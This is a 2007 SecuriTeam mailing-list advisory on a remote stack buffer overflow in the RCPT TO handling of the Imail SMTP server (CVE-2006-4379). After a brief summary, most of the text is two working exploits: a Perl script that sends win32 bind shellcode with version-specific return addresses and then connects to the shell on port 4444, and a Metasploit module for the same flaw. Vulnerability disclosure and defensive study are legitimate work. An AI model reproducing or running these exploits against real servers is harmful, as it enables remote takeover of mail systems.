[EXPL] Imail Buffer Overflow Exploit (RCPT TO)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 5 Feb 2007 17:45:39 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Imail Buffer Overflow Exploit (RCPT TO)
------------------------------------------------------------------------
SUMMARY
" <http://www.ipswitch.com/products/imail/index.asp> IMail Server is an
easy to use mail server that protects you from spam and viruses". "
<http://www.ipswitch.com/products/collaboration/index.asp> Ipswitch
Collaboration Suite includes an email server, secure instant messaging,
anti-virus, anti-spam, shared calendering and other email and
collaboration features." A vulnerability in the way Imail handles incoming
RCPT TO requests allows remote attackers to overflow an internal buffer
used by the program, which in turn can be used to cause the program to
execute arbitrary code.
DETAILS
Vulnerable Systems:
* Imail SMTP Server versions 8.10-8.12
Exploit (perl):
#!/usr/bin/perl
# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV < 3) {
"--------------------------------------------------------------------\n";
print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress
-oTargetReturnAddress\n";
print " Return address: \n";
print " o1 - IMail 8.12 Version\n";
print " o2 - IMail 8.10 Versio\n";
print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl
-h127.0.0.1 -o1 \n";
"--------------------------------------------------------------------\n";
}
use IO::Socket::INET;
my $host = 10.0.0.2;
my $port = 25;
my $reply;
my $request;
my $happystack="\x81\xc4\xff\xef\xff\xff\x44";
foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$eip = $1 if ($_=~/-o(.*)/);
}
switch ($eip) {
case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail
8.12
case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail
8.10
}
# win32_bind - EXITFUNC=seh LPORT=4444
my $shellcode =
"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93".
"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9".
"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd".
"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf".
"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e".
"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd".
"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd".
"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66".
"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6".
"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34".
"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65".
"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7".
"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e".
"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f".
"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61".
"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66".
"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b".
"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9".
"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67".
"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6".
"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69".
"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
my $nop="\x41"x137;
my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a"
$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO " . "\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" .
"\x3e" . "\r\n";
send $socket, $request, 0;
print "[+] Sent MAIL FROM\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $buffer;
send $socket, $request, 0;
print "[+] Sent malicius request\n";
close $socket;
print " + connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
Exploit (metasploit):
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 25],
'Encoder' => [1, 'EncodedPayload', 'Use Pex!!'],
},
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x0a\x20\x3e\x22\x40",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack based buffer overflow in IMail 2006 and 8.x
SMTP service.
If we send a long strings for RCPT TO command contained within the
characters '@' and ':'
we can overwrite the eip register and exploit the vulnerable smpt service
}),
'Refs' =>
[
['BID', '19885'],
['CVE', '2006-4379'],
['URL',
'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
],
'Targets' =>
[
['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in
SmtpDLL.dll for IMail 8.10
['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in
SmtpDLL.dll for IMail 8.12
],
'DefaultTarget' => 0,
'Keys' => ['smtp'],
'DisclosureDate' => 'September 7 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' =>
$advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $ehlo = "EHLO " . "\r\n";
my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro".
"\x40"."jervus.it" . "\x3e" . "\r\n";
my $pattern = "\x20\x3c\x40";
$pattern .= pack('V', $target->[1]);
$pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode)));
$pattern .= $shellcode;
$pattern .= "\x4a\x61\x63\x3e";
my $request = "RCPT TO: " . $pattern ."\n";
$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using pop
eax, ret at 0x%.8x...", $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' .
$s->GetError);
return;
}
my $r = $s->Recv(-1, 5);
$s->Send($ehlo);
$self->PrintLine("[*] I'm sending ehlo command");
$self->PrintLine("[*] $r");
sleep(2);
$s->Send($mail_from);
$self->PrintLine("[*] I'm sending mail from command");
$r = $s->Recv(-1, 10);
$self->PrintLine("[*] $r");
sleep(2);
$s->Send($request);
$self->PrintLine("[*] I'm sending rcpt to command");
sleep(2);
return;
}
ADDITIONAL INFORMATION
The original articles could be found at:
<http://www.milw0rm.com/exploits/3264>
http://www.milw0rm.com/exploits/3264
<http://www.milw0rm.com/exploits/3265>
http://www.milw0rm.com/exploits/3265
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] Oracle Enterprise Manager Directory Traversal Vulnerability
- Next by Date: [NEWS] Firefox Popup Blocker Allows Reading Arbitrary Local Files
- Previous by thread: [NEWS] Oracle Enterprise Manager Directory Traversal Vulnerability
- Next by thread: [NEWS] Firefox Popup Blocker Allows Reading Arbitrary Local Files
- Index(es):
Relevant Pages
|
